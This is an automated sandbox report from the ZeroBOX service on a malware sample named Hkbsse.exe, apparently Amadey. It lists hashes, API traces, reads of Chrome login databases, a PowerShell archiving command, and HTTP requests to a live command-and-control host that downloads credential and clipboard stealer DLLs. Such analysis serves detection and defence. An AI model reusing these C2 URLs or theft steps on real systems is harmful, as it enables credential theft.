popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Hkbsse.exe

Amadey Generic Malware Malicious Library Antivirus UPX Malicious Packer PE File PE64 DLL OS Processor Check JPEG Format PE32
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 26, 2024, 10:19 a.m. Sept. 26, 2024, 10:21 a.m.
Size 434.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 e4f3ed3daf21363918afbc91db6f775b
SHA256 4c6f323142d184d3021fce521628676badac99d1664d8ec208e6d2fb298e65b4
CRC32 42292343
ssdeep 12288:iAHIqeXuOre8e8lHcafb1eVL5u2OUtkr:nIqeXu2ewWqb1w7tkr
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • Malicious_Packer_Zero - Malicious Packer
  • IsPE32 - (no description)
  • Generic_Malware_Zero - Generic Malware
  • UPX_Zero - UPX packed file
  • OS_Processor_Check_Zero - OS Processor Check

Name Response Post-Analysis Lookup
amoamosss.com
A 31.41.154.129
31.41.154.129
IP Address Status Action
164.124.101.2 Active Moloch
31.41.154.129 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000311cb0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4942a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4942a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4942a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4942a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4942a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b493ba0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b493ba0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b493ba0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b493ba0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b494540
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b494540
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b494540
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b494230
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b494230
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b494230
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b494a10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b494a10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b494a10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b494a10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b494a10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b494a10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b494af0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b494af0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000000038e110
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000000038e110
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000000038e110
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002f6430
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002f6430
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b493f90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b493f90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b494230
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b494230
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b494230
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4c2950
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4c2950
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4c29c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4c29c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4c3360
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4c3360
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002f63c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002f63c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4943f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4943f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4943f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b4943f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
file C:\Program Files (x86)\Google\Chrome\Application\Psi\profiles\default\accounts.xml
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe\Path
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://amoamosss.com/Dem7kTu/index.php
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://amoamosss.com/Dem7kTu/index.php?scr=1
suspicious_features GET method with no useragent header suspicious_request GET http://amoamosss.com/Dem7kTu/Plugins/cred64.dll
suspicious_features GET method with no useragent header suspicious_request GET http://amoamosss.com/Dem7kTu/Plugins/clip64.dll
request POST http://amoamosss.com/Dem7kTu/index.php
request POST http://amoamosss.com/Dem7kTu/index.php?scr=1
request GET http://amoamosss.com/Dem7kTu/Plugins/cred64.dll
request GET http://amoamosss.com/Dem7kTu/Plugins/clip64.dll
request POST http://amoamosss.com/Dem7kTu/index.php
request POST http://amoamosss.com/Dem7kTu/index.php?scr=1
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ba0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1452
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000046e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2664
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73572000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2892
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2052
region_size: 2490368
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002960000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2052
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002b40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2052
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2052
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef373e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2052
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef373e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2052
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef373f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2052
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef373f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2052
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef373f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2052
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef373f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2052
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef373f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2052
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef373f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2052
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef373f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2052
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef373f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2052
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3740000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2052
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3740000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2052
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3740000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2052
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3740000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2052
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3740000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2052
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3741000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2052
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3741000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2052
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3741000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2052
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3741000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2052
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef373e000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00052000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2052
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2052
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0010a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2052
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002b42000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2052
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002b44000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0011a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00053000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00054000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00142000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0011d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0010b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00102000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00055000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00190000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00056000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00143000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-wal
file C:\Users\test22\AppData\Local\Chromium\User Data\Default\Login Data
file C:\Users\test22\AppData\Roaming\8cadd6e0860cae\clip64.dll
file C:\Users\test22\AppData\Roaming\8cadd6e0860cae\cred64.dll
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -Command Compress-Archive -Path 'C:\Users\test22\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\test22\AppData\Local\Temp\832866432405_Desktop.zip' -CompressionLevel Optimal
file C:\Users\test22\AppData\Local\Temp\063c9e1716\Hkbsse.exe
file C:\Users\test22\AppData\Local\Temp\063c9e1716\Hkbsse.exe
file C:\Users\test22\AppData\Roaming\8cadd6e0860cae\clip64.dll
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\063c9e1716\Hkbsse.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\063c9e1716\Hkbsse.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\8cadd6e0860cae\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\8cadd6e0860cae\clip64.dll, Main
filepath: rundll32.exe
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x0000000000000130
process_name: pw.exe
process_identifier: 988
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000130
process_name: SearchIndexer.exe
process_identifier: 1160
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000130
process_name: SearchProtocolHost.exe
process_identifier: 936
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000130
process_name: SearchFilterHost.exe
process_identifier: 2000
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000130
process_name: pw.exe
process_identifier: 2328
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000130
process_name: taskhost.exe
process_identifier: 2352
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000130
process_name: Hkbsse.exe
process_identifier: 2664
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000130
process_name: rundll32.exe
process_identifier: 2848
1 1 0

Process32NextW

 snapshot_handle: 0x0000000000000130
process_name: rundll32.exe
process_identifier: 2892
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÆÞÉ ‚¿§^‚¿§^‚¿§^Ù×£_‘¿§^Ùפ_’¿§^Ù×¢_2¿§^WÒ¢_Ä¿§^WÒ£_¿§^WÒ¤_‹¿§^Ùצ_¿§^‚¿¦^C¿§^Ñ®_†¿§^ѧ_ƒ¿§^ÑX^ƒ¿§^Ñ¥_ƒ¿§^Rich‚¿§^PEd†ŸÁfð" ¼TÈ €P`@‰X˜‰Œ ø`p­0ôОp@ŸÐè.text¨º¼ `.rdataÎÐÐÀ@@.data¬» D@À.pdatap­`®Ô@@_RDATA”‚@@.rsrcø „@@.relocô0†@BHƒì(A¸ H§nH à»è3 H lHƒÄ(é/í ÌÌÌHƒì(A¸ HŸnH ðÂè H ¬HƒÄ(éÿì ÌÌÌHƒì(A¸H“nH àÃèÓ H ìHƒÄ(éÏì ÌÌÌHƒì(A¸ HonH 0½è£ H ,€HƒÄ(éŸì ÌÌÌHƒì(A¸HgnH Âès H l€HƒÄ(éoì ÌÌÌHƒì(A¸HOnH 0ºèC H ¬€HƒÄ(é?ì ÌÌÌHƒì(E3ÀHÂÏH ÃÂè H ï€HƒÄ(éì ÌÌÌÌÌÌHƒì(E3ÀH’ÏH 3Ãèæ H /HƒÄ(éâë ÌÌÌÌÌÌHƒì(E3ÀHbÏH c¼è¶ H oHƒÄ(é²ë ÌÌÌÌÌÌHƒì(E3ÀH2ÏH ó¸è† H ¯HƒÄ(é‚ë ÌÌÌÌÌÌHƒì(A¸HmH À¹èS H ìHƒÄ(éOë ÌÌÌHƒì(A¸H_mH ÐÅè# H ,‚HƒÄ(éë ÌÌÌHƒì(A¸H?mH `Áèó H l‚HƒÄ(éïê ÌÌÌHƒì(A¸HmH p·èà H ¬‚HƒÄ(é¿ê ÌÌÌHƒì(A¸$HÿlH  ¹è“ H ì‚HƒÄ(éê ÌÌÌHƒì(A¸H÷lH PÂèc H ,ƒHƒÄ(é_ê ÌÌÌHƒì(A¸HßlH `ºè3 H lƒHƒÄ(é/ê ÌÌÌHƒì(A¸ HÏlH p½è H ¬ƒHƒÄ(éÿé ÌÌÌHƒì(A¸H¯lH `½èÓ H ìƒHƒÄ(éÏé ÌÌÌHƒì(A¸HlH p¼è£ H 